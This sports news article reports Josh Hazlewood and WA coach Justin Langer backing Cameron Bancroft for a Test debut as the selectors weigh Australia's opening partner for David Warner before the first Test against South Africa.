Australian paceman Josh Hazlewood says Western Australian batsman Cameron Bancroft is ready to make the jump to Test cricket.

With Shaun Marsh all but ruled out of the opening Test against South Africa on November 3, the fight to be David Warner's opening partner looks to be down to Joe Burns and Usman Khawaja. However, Hazlewood says Bancroft is also a chance to make his debut, with the spearhead believing the youngster is good enough to make his debut.

Bancroft, 23, was named in the Australian Test squad for last October's tour of Bangladesh. However, the tour was cancelled due to safety concerns. He has enjoyed a consistent few years at Shield level, averaging 45 with the bat last season and 47 the season prior.

"He looked pretty good," Hazlewood said.

"I haven't seen much of him through the tournament (the Matador Cup) but, today (Wednesday), he definitely batted really well.

"He was obviously pretty close (to playing a Test) when we were going to tour Bangladesh and got put on the backburner a bit.

"But he's definitely someone that would go well in Australian colours.

"He's had a good couple of Shield seasons.

"He scores a lot of runs and puts a high value on his wicket, so he's a good young player."

WA coach Justin Langer sung Bancroft's praises.

"He's had a couple of really good seasons. This time last year he was selected to go to Bangladesh, but then that was obviously cancelled," Langer said.

"And he deserved that opportunity I thought. Then some other guys got the opportunity, Joe Burns and Uzzy (Khawaja) played beautifully last summer so that's what happens when you give a sucker an even break isn't it."
